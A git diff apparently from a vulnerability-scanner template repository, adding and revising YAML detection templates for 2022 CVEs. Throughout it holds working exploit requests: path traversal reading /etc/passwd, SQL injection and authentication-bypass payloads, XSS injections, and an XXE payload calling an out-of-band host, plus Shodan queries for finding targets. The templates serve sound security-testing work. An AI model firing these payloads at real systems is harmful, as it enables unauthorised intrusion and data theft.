     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
     cvss-score: 5.3
diff --git a/cves/2022/CVE-2022-26233.yaml b/cves/2022/CVE-2022-26233.yaml
index 1866d6cbaf..85601b85f3 100644
--- a/cves/2022/CVE-2022-26233.yaml
+++ b/cves/2022/CVE-2022-26233.yaml
@@ -1,19 +1,22 @@
 id: CVE-2022-26233
 
 info:
-  name: Barco Control Room Management Suite - Directory Traversal
+  name: Barco Control Room Management Suite <=2.9 Build 0275 - Local File Inclusion
   author: 0x_Akoko
   severity: high
-  description: Barco Control Room Management through Suite 2.9 Build 0275 was discovered to be vulnerable to directory traversal, allowing attackers to access sensitive information and components. Requests must begin with the "GET /..\.." substring.
+  description: Barco Control Room Management through Suite 2.9 Build 0275 is vulnerable to local file inclusion that could allow attackers to access sensitive information and components. Requests must begin with the "GET /..\.." substring.
   reference:
     - https://0day.today/exploit/37579
     - https://www.cvedetails.com/cve/CVE-2022-26233
+    - http://seclists.org/fulldisclosure/2022/Apr/0
+    - http://packetstormsecurity.com/files/166577/Barco-Control-Room-Management-Suite-Directory-Traversal.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-26233
   classification:
-    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2022-26233
     cwe-id: CWE-22
-  tags: cve,cve2022,barco,lfi
+  tags: cve,cve2022,barco,lfi,seclists,packetstorm
 
 requests:
   - raw:
@@ -30,3 +33,5 @@ requests:
           - "fonts"
           - "extensions"
         condition: and
+
+# Enhanced by mp on 2022/07/15
diff --git a/cves/2022/CVE-2022-26352.yaml b/cves/2022/CVE-2022-26352.yaml
index 711cc65c7a..159d6dd4a0 100644
--- a/cves/2022/CVE-2022-26352.yaml
+++ b/cves/2022/CVE-2022-26352.yaml
@@ -1,16 +1,21 @@
 id: CVE-2022-26352
 
 info:
-  name: DotCMS Arbitrary File Upload
+  name: DotCMS - Arbitrary File Upload
   author: h1ei1
   severity: critical
-  description: There is an arbitrary file upload vulnerability in the /api/content/ path of the DotCMS management system, and attackers can upload malicious Trojans to obtain server permissions.
+  description: DotCMS management system contains an arbitrary file upload vulnerability via the /api/content/ path which can allow attackers to upload malicious Trojans to obtain server permissions.
   reference:
     - https://blog.assetnote.io/2022/05/03/hacking-a-bank-using-dotcms-rce/
     - https://github.com/h1ei1/POC/tree/main/CVE-2022-26352
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26352
+    - http://packetstormsecurity.com/files/167365/dotCMS-Shell-Upload.html
   classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
     cve-id: CVE-2022-26352
-  tags: cve,cve2022,rce,dotcms
+    cwe-id: CWE-22,CWE-434
+  tags: packetstorm,cve,cve2022,rce,dotcms,kev,fileupload,intrusive
 
 requests:
   - raw:
@@ -39,3 +44,5 @@ requests:
           - 'contains(body_2, "CVE-2022-26352")'
           - 'status_code_2 == 200'
         condition: and
+
+# Enhanced by mp on 2022/05/19
diff --git a/cves/2022/CVE-2022-26564.yaml b/cves/2022/CVE-2022-26564.yaml
index df408ee328..33e215310b 100644
--- a/cves/2022/CVE-2022-26564.yaml
+++ b/cves/2022/CVE-2022-26564.yaml
@@ -1,45 +1,48 @@
-id: CVE-2022-26564
-
-info:
-  name: HotelDruid Hotel Management Software 3.0.3 XSS
-  author: alexrydzak
-  severity: medium
-  description: |
-    HotelDruid Hotel Management Software v3.0.3 contains a cross-site scripting (XSS) vulnerability.
-  reference:
-    - https://rydzak.me/2022/04/cve-2022-26564/
-    - https://nvd.nist.gov/vuln/detail/CVE-2022-26564
-  metadata:
-    shodan-query: http.favicon.hash:-1521640213
-  classification:
-    cve-id: CVE-2022-26564
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
-    cvss-score: 6.1
-    cwe-id: CWE-79
-  tags: cve,cve2022,hoteldruid,xss
-
-requests:
-  - method: GET
-    path:
-      - '{{BaseURL}}/creaprezzi.php?prezzoperiodo4=%22><script>javascript:alert(%27XSS%27)</script>'
-      - '{{BaseURL}}/modifica_cliente.php?tipo_tabella=%22><script>javascript:alert(%27XSS%27)</script>&idclienti=1'
-      - '{{BaseURL}}/dati/availability_tpl.php?num_app_tipo_richiesti1=%22><script>javascript:alert(%27XSS%27)</script>'
-
-    stop-at-first-match: true
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - "<script>javascript:alert('XSS')</script>"
-          - "HotelDruid"
-        condition: and
-
-      - type: word
-        part: header
-        words:
-          - "text/html"
-
-      - type: status
-        status:
-          - 200
\ No newline at end of file
+id: CVE-2022-26564
+
+info:
+  name: HotelDruid Hotel Management Software 3.0.3 - Cross-Site Scripting
+  author: alexrydzak
+  severity: medium
+  description: |
+    HotelDruid Hotel Management Software 3.0.3 contains a cross-site scripting vulnerability via the prezzoperiodo4 parameter in creaprezzi.php.
+  reference:
+    - https://rydzak.me/2022/04/cve-2022-26564/
+    - https://www.hoteldruid.com
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-26564
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2022-26564
+    cwe-id: CWE-79
+  metadata:
+    shodan-query: http.favicon.hash:-1521640213
+  tags: cve,cve2022,hoteldruid,xss
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/creaprezzi.php?prezzoperiodo4=%22><script>javascript:alert(%27XSS%27)</script>'
+      - '{{BaseURL}}/modifica_cliente.php?tipo_tabella=%22><script>javascript:alert(%27XSS%27)</script>&idclienti=1'
+      - '{{BaseURL}}/dati/availability_tpl.php?num_app_tipo_richiesti1=%22><script>javascript:alert(%27XSS%27)</script>'
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<script>javascript:alert('XSS')</script>"
+          - "HotelDruid"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/09/09
diff --git a/cves/2022/CVE-2022-26960.yaml b/cves/2022/CVE-2022-26960.yaml
new file mode 100644
index 0000000000..d244810944
--- /dev/null
+++ b/cves/2022/CVE-2022-26960.yaml
@@ -0,0 +1,40 @@
+id: CVE-2022-26960
+
+info:
+  name: elFinder <=2.1.60 - Local File Inclusion
+  author: pikpikcu
+  severity: critical
+  description: |
+    elFinder through 2.1.60 is affected by local file inclusion via connector.minimal.php. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths.
+  reference:
+    - https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html
+    - https://github.com/Studio-42/elFinder/commit/3b758495538a448ac8830ee3559e7fb2c260c6db
+    - https://www.synacktiv.com/publications.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-26960
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
+    cvss-score: 9.1
+    cve-id: CVE-2022-26960
+    cwe-id: CWE-22
+  metadata:
+    verified: true
+  tags: cve,cve2022,lfi,elfinder
+
+requests:
+  - raw:
+      - |
+        GET /elfinder/php/connector.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>&download=1 HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:.*:0:0:"
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/07/05
diff --git a/cves/2022/CVE-2022-27849.yaml b/cves/2022/CVE-2022-27849.yaml
index 67767168e0..d52f9a2027 100644
--- a/cves/2022/CVE-2022-27849.yaml
+++ b/cves/2022/CVE-2022-27849.yaml
@@ -1,20 +1,22 @@
 id: CVE-2022-27849
+
 info:
-  name: WordPress Simple Ajax Chat plugin <= 20220115 - Sensitive Information Disclosure vulnerability
+  name: WordPress Simple Ajax Chat <20220116 - Sensitive Information Disclosure vulnerability
   author: random-robbie
-  severity: medium
+  severity: high
   description: |
-        Simple Ajax Chat < 20220216 - Sensitive Information Disclosure. The plugin does not properly restrict access to the exported data via the sac-export.csv file, which could allow unauthenticated users to access it
+    WordPress Simple Ajax Chat before 20220216 is vulnerable to sensitive information disclosure. The plugin does not properly restrict access to the exported data via the sac-export.csv file, which could allow unauthenticated users to access it.
   reference:
     - https://wordpress.org/plugins/simple-ajax-chat/#developers
-    - https://nvd.nist.gov/vuln/detail/CVE-2022-27849/
+    - https://patchstack.com/database/vulnerability/simple-ajax-chat/wordpress-simple-ajax-chat-plugin-20220115-sensitive-information-disclosure-vulnerability
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-27849
   classification:
-    cvss-metrics: 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'
-    cvss-score: 5.3
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
     cve-id: CVE-2022-27849
     cwe-id: CWE-200
   metadata:
-    google-dork: inurl:/wp-content/plugins/simple-ajax-chat/
+    google-query: inurl:/wp-content/plugins/simple-ajax-chat/
   tags: wp,wordpress,wp-plugin,cve,cve2022,disclosure
 
 requests:
@@ -40,3 +42,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/15
diff --git a/cves/2022/CVE-2022-27927.yaml b/cves/2022/CVE-2022-27927.yaml
new file mode 100644
index 0000000000..64d50a460c
--- /dev/null
+++ b/cves/2022/CVE-2022-27927.yaml
@@ -0,0 +1,44 @@
+id: CVE-2022-27927
+
+info:
+  name: Microfinance Management System 1.0 - SQL Injection
+  author: lucasljm2001,ekrause
+  severity: critical
+  description: |
+    Microfinance Management System 1.0 is susceptible to SQL Injection.
+  reference:
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27927
+    - https://www.sourcecodester.com/sites/default/files/download/oretnom23/mims_0.zip
+    - https://www.exploit-db.com/exploits/50891
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-27927
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-27927
+    cwe-id: CWE-89
+  metadata:
+    verified: "true"
+  tags: microfinance,edb,cve,cve2022,sqli
+
+variables:
+  num: "999999999"
+
+requests:
+  - raw:
+      - |
+        GET /mims/updatecustomer.php?customer_number=-1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(md5({{num}}),1,2),NULL,NULL,NULL,NULL,NULL,NULL' HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        part: body
+        words:
+          - '{{md5({{num}})}}'
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/07/04
diff --git a/cves/2022/CVE-2022-28079.yaml b/cves/2022/CVE-2022-28079.yaml
new file mode 100644
index 0000000000..c1b122ba24
--- /dev/null
+++ b/cves/2022/CVE-2022-28079.yaml
@@ -0,0 +1,45 @@
+id: CVE-2022-28079
+
+info:
+  name: College Management System 1.0 - SQL Injection
+  author: ritikchaddha
+  severity: high
+  description: |
+    College Management System 1.0 contains a SQL injection vulnerability via the course code parameter.
+  reference:
+    - https://github.com/erengozaydin/College-Management-System-course_code-SQL-Injection-Authenticated
+    - https://download.code-projects.org/details/1c3b87e5-f6a6-46dd-9b5f-19c39667866f
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-28079
+    - https://code-projects.org/college-management-system-in-php-with-source-code/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2022-28079
+    cwe-id: CWE-89
+  metadata:
+    verified: "true"
+  tags: cve,cve2022,sqli,cms,collegemanagement
+
+variables:
+  num: "999999999"
+
+requests:
+  - raw:
+      - |
+        POST /admin/asign-single-student-subjects.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        submit=Press&roll_no=3&course_code=sd' UNION ALL SELECT CONCAT(md5({{num}}),12,21),NULL,NULL,NULL,NULL#
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '{{md5({{num}})}}'
+
+      - type: status
+        status:
+          - 302
+
+# Enhanced by mp on 2022/07/15
diff --git a/cves/2022/CVE-2022-28080.yaml b/cves/2022/CVE-2022-28080.yaml
new file mode 100644
index 0000000000..021d8a2b18
--- /dev/null
+++ b/cves/2022/CVE-2022-28080.yaml
@@ -0,0 +1,72 @@
+id: CVE-2022-28080
+
+info:
+  name: Royal Event - SQL Injection
+  author: lucasljm2001,ekrause,ritikchaddha
+  severity: high
+  description: |
+    Royal Event is vulnerable to a SQL injection vulnerability.
+  reference:
+    - https://www.exploit-db.com/exploits/50934
+    - https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip
+    - https://github.com/erengozaydin/Royal-Event-Management-System-todate-SQL-Injection-Authenticated
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-28080
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2022-28080
+  tags: royalevent,edb,cve,cve2022,sqli,authenticated,cms
+
+requests:
+  - raw:
+      - |
+        POST /royal_event/ HTTP/1.1
+        Host: {{Hostname}}
+        Content-Length: 353
+        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCSxQll1eihcqgIgD
+
+        ------WebKitFormBoundaryCSxQll1eihcqgIgD
+        Content-Disposition: form-data; name="username"
+
+        {{username}}
+        ------WebKitFormBoundaryCSxQll1eihcqgIgD
+        Content-Disposition: form-data; name="password"
+
+        {{password}}
+        ------WebKitFormBoundaryCSxQll1eihcqgIgD
+        Content-Disposition: form-data; name="login"
+
+
+        ------WebKitFormBoundaryCSxQll1eihcqgIgD--
+
+      - |
+        POST /royal_event/btndates_report.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFboH5ITu7DsGIGrD
+
+        ------WebKitFormBoundaryFboH5ITu7DsGIGrD
+        Content-Disposition: form-data; name="todate"
+
+        1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5("{{randstr}}"),0x1,0x2),NULL-- -
+        ------WebKitFormBoundaryFboH5ITu7DsGIGrD
+        Content-Disposition: form-data; name="search"
+
+        3
+        ------WebKitFormBoundaryFboH5ITu7DsGIGrD
+        Content-Disposition: form-data; name="fromdate"
+
+        01/01/2011
+        ------WebKitFormBoundaryFboH5ITu7DsGIGrD--
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '{{md5("{{randstr}}")}}'
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/07/15
diff --git a/cves/2022/CVE-2022-28219.yaml b/cves/2022/CVE-2022-28219.yaml
new file mode 100644
index 0000000000..16c51b8734
--- /dev/null
+++ b/cves/2022/CVE-2022-28219.yaml
@@ -0,0 +1,58 @@
+id: CVE-2022-28219
+
+info:
+  name: Zoho ManageEngine ADAudit Plus <7600 - XML Entity Injection/Remote Code Execution
+  author: dwisiswant0
+  severity: critical
+  description: |
+    Zoho ManageEngine ADAudit Plus before version 7060 is vulnerable to an
+    unauthenticated XML entity injection attack that can lead to remote code execution.
+  reference:
+    - https://www.manageengine.com/products/active-directory-audit/cve-2022-28219.html
+    - https://www.horizon3.ai/red-team-blog-cve-2022-28219/
+    - https://manageengine.com
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-28219
+  remediation: |
+    Update to ADAudit Plus build 7060 or later, and ensure ADAudit Plus
+    is configured with a dedicated service account with restricted privileges.
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-28219
+    cwe-id: CWE-611
+  metadata:
+    shodan-query: http.title:"ADAudit Plus" || http.title:"ManageEngine - ADManager Plus"
+    verified: "true"
+  tags: cve,cve2022,xxe,rce,zoho,manageengine,unauth
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/api/agent/tabs/agentData"
+
+    headers:
+      Content-Type: application/json
+    body: |
+      [
+        {
+          "DomainName": "{{Host}}",
+          "EventCode": 4688,
+          "EventType": 0,
+          "TimeGenerated": 0,
+          "Task Content": "<?xml version=\"1.0\" encoding=\"UTF-8\"?><! foo [ <!ENTITY % xxe SYSTEM \"http://{{interactsh-url}}\"> %xxe; ]>"
+        }
+      ]
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol # Confirms the HTTP Interaction
+        words:
+          - "http"
+
+      - type: word
+        part: body
+        words:
+          - "ManageEngine"
+
+# Enhanced by mp on 2022/07/04
diff --git a/cves/2022/CVE-2022-28363.yaml b/cves/2022/CVE-2022-28363.yaml
index b78b96ed26..fc2e62196f 100644
--- a/cves/2022/CVE-2022-28363.yaml
+++ b/cves/2022/CVE-2022-28363.yaml
@@ -1,7 +1,7 @@
 id: CVE-2022-28363
 
 info:
-  name: Reprise License Manager 14.2 - Reflected Cross-Site Scripting
+  name: Reprise License Manager 14.2 - Cross-Site Scripting
   author: Akincibor
   severity: medium
   description: |
@@ -16,7 +16,7 @@ info:
     cvss-score: 6.1
     cve-id: CVE-2022-28363
     cwe-id: CWE-79
-  tags: cve,cve2022,xss,rlm
+  tags: xss,rlm,packetstorm,cve,cve2022
 
 requests:
   - method: GET
diff --git a/cves/2022/CVE-2022-28365.yaml b/cves/2022/CVE-2022-28365.yaml
index 2260c8d8ae..0630000a5e 100644
--- a/cves/2022/CVE-2022-28365.yaml
+++ b/cves/2022/CVE-2022-28365.yaml
@@ -16,7 +16,7 @@ info:
     cvss-score: 5.3
     cve-id: CVE-2022-28365
     cwe-id: CWE-668
-  tags: cve,cve2022,exposure,rlm
+  tags: rlm,packetstorm,cve,cve2022,exposure
 
 requests:
   - method: GET
diff --git a/cves/2022/CVE-2022-28955.yaml b/cves/2022/CVE-2022-28955.yaml
new file mode 100644
index 0000000000..3b532d866e
--- /dev/null
+++ b/cves/2022/CVE-2022-28955.yaml
@@ -0,0 +1,38 @@
+id: CVE-2022-28955
+
+info:
+  name: D-Link DIR816L - Access Control
+  author: arafatansari
+  severity: high
+  description: |
+    An access control issue in D-Link DIR816L_FW206b01 allows unauthenticated attackers to access folders folder_view.php and category_view.php.
+  reference:
+    - https://github.com/shijin0925/IOT/blob/master/DIR816/1.md
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-28955
+    - https://www.dlink.com/en/security-bulletin/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2022-28955
+    cwe-id: CWE-287
+  metadata:
+    shodan-query: http.html:"DIR-816L"
+    verified: "true"
+  tags: cve,cve2022,dlink,exposure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/category_view.php"
+      - "{{BaseURL}}/folder_view.php"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<title>SharePort Web Access</title>'
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2022/CVE-2022-29004.yaml b/cves/2022/CVE-2022-29004.yaml
new file mode 100644
index 0000000000..1736ffe755
--- /dev/null
+++ b/cves/2022/CVE-2022-29004.yaml
@@ -0,0 +1,53 @@
+id: CVE-2022-29004
+
+info:
+  name: Diary Management System v1.0 - Cross-Site scripting
+  author: TenBird
+  severity: medium
+  description: |
+    Diary Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the Name parameter in search-result.php.
+  reference:
+    - https://github.com/sudoninja-noob/CVE-2022-29004/blob/main/CVE-2022-29004.txt
+    - https://phpgurukul.com/e-diary-management-system-using-php-and-mysql/
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-29004
+    - http://phpgurukul.com
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2022-29004
+    cwe-id: CWE-79
+  metadata:
+    verified: "true"
+  tags: cve,cve2022,xss,authenticated,edms
+requests:
+  - raw:
+      - |
+        POST /edms/login.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+        logindetail={{username}}&userpassword={{password}}&login=
+
+      - |
+        POST /edms/search-result.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+        searchdata=<script>alert(document.domain);</script>
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Serach Result Against "<script>alert(document.domain);</script>'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2022/CVE-2022-29005.yaml b/cves/2022/CVE-2022-29005.yaml
new file mode 100644
index 0000000000..d173c2ecf7
--- /dev/null
+++ b/cves/2022/CVE-2022-29005.yaml
@@ -0,0 +1,50 @@
+id: CVE-2022-29005
+info:
+  name: Online Birth Certificate System V1.2 - Stored Cross-Site scripting
+  author: TenBird
+  severity: medium
+  description: |
+    Multiple cross-site scripting (XSS) vulnerabilities in the component /obcs/user/profile.php of Online Birth Certificate System v1.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the fname or lname parameters.
+  reference:
+    - https://github.com/sudoninja-noob/CVE-2022-29005/blob/main/CVE-2022-29005.txt
+    - https://phpgurukul.com/online-birth-certificate-system-using-php-and-mysql/
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-29005
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2022-29005
+    cwe-id: CWE-79
+  metadata:
+    verified: "true"
+  tags: cve,cve2022,xss,obcs,authenticated
+requests:
+  - raw:
+      - |
+        POST /obcs/user/login.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+        mobno={{username}}&password={{password}}&login=
+
+      - |
+        POST /obcs/user/profile.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+        fname=nuclei%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&lname=nuclei%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&add=New+Delhi+India+110001&submit=
+
+      - |
+        GET /obcs/user/dashboard.php HTTP/1.1
+        Host: {{Hostname}}
+
+    req-condition: true
+    redirects: true
+    max-redirects: 2
+    cookie-reuse: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(all_headers_3, "text/html")'
+          - 'status_code_3 == 200'
+          - contains(body_3, 'admin-name\">nuclei<script>alert(document.domain);</script>')
+        condition: and
diff --git a/cves/2022/CVE-2022-29006.yaml b/cves/2022/CVE-2022-29006.yaml
new file mode 100644
index 0000000000..b9e89483d4
--- /dev/null
+++ b/cves/2022/CVE-2022-29006.yaml
@@ -0,0 +1,47 @@
+id: CVE-2022-29006
+
+info:
+  name: Directory Management System  1.0 - SQLi Authentication Bypass
+  author: TenBird
+  severity: critical
+  description: |
+    Multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel of Directory Management System v1.0 allows attackers to bypass authentication.
+  reference:
+    - https://www.exploit-db.com/exploits/50370
+    - https://phpgurukul.com/directory-management-system-using-php-and-mysql/
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-29006
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-29006
+    cwe-id: CWE-89
+  metadata:
+    verified: "true"
+  tags: cve,cve2022,sqli,auth-bypass,edb
+requests:
+  - raw:
+      - |
+        POST /admin/index.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+        username=admin' or '1'='1&password=1&login=login
+
+      - |
+        GET /admin/dashboard.php HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'DMS || Dashboard'
+          - 'DMS Admin'
+          - 'Admin Profile'
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2022/CVE-2022-29007.yaml b/cves/2022/CVE-2022-29007.yaml
new file mode 100644
index 0000000000..780527e962
--- /dev/null
+++ b/cves/2022/CVE-2022-29007.yaml
@@ -0,0 +1,47 @@
+id: CVE-2022-29007
+
+info:
+  name: Dairy Farm Shop Management System v1.0 - SQLi Authentication Bypass
+  author: TenBird
+  severity: critical
+  description: |
+    Multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel of Dairy Farm Shop Management System v1.0 allows attackers to bypass authentication.
+  reference:
+    - https://www.exploit-db.com/exploits/50365
+    - https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-29007
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-29007
+    cwe-id: CWE-89
+  metadata:
+    verified: "true"
+  tags: cve,cve2022,sqli,auth-bypass,edb
+requests:
+  - raw:
+      - |
+        POST /dfsms/index.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+        username=admin' or '1'='1&password=1&login=login
+
+      - |
+        GET /dfsms/add-category.php HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>Add Product</title>'
+          - '<span>Admin'
+          - 'DFSMS'
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2022/CVE-2022-29009.yaml b/cves/2022/CVE-2022-29009.yaml
new file mode 100644
index 0000000000..1be6d17dfc
--- /dev/null
+++ b/cves/2022/CVE-2022-29009.yaml
@@ -0,0 +1,46 @@
+id: CVE-2022-29009
+
+info:
+  name: Cyber Cafe Management System Project v1.0 - SQLi Authentication Bypass
+  author: TenBird
+  severity: critical
+  description: |
+    Multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel of Cyber Cafe Management System Project v1.0 allows attackers to bypass authentication.
+  reference:
+    - https://www.exploit-db.com/exploits/50355
+    - https://phpgurukul.com/cyber-cafe-management-system-using-php-mysql/
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-29009
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-29009
+    cwe-id: CWE-89
+  metadata:
+    verified: "true"
+  tags: cve2022,sqli,auth-bypass,edb,cve
+requests:
+  - raw:
+      - |
+        POST /ccms/index.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+        username=%27+Or+1--+-&password=1&login=
+
+      - |
+        GET /ccms/dashboard.php HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'CCMS Admin Dashboard'
+          - 'CCMS ADMIN | Admin'
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2022/CVE-2022-29014.yaml b/cves/2022/CVE-2022-29014.yaml
new file mode 100644
index 0000000000..b7c1a26f7f
--- /dev/null
+++ b/cves/2022/CVE-2022-29014.yaml
@@ -0,0 +1,38 @@
+id: CVE-2022-29014
+
+info:
+  name: Razer Sila Gaming Router 2.0.441_api-2.0.418 - Local File Inclusion
+  author: edoardottt
+  severity: high
+  description: Razer Sila Gaming Router 2.0.441_api-2.0.418 is vulnerable to local file inclusion which could allow attackers to read arbitrary files.
+  reference:
+    - https://www.exploit-db.com/exploits/50864
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-29014
+    - https://www2.razer.com/ap-en/desktops-and-networking/razer-sila
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2022-29014
+  tags: cve,cve2022,razer,lfi,router,edb
+
+requests:
+  - raw:
+      - |
+        POST /ubus/ HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        {"jsonrpc":"2.0","id":3,"method":"call","params":["4183f72884a98d7952d953dd9439a1d1","file","read",{"path":"/etc/passwd"}]}
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:.*:0:0:"
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/07/15
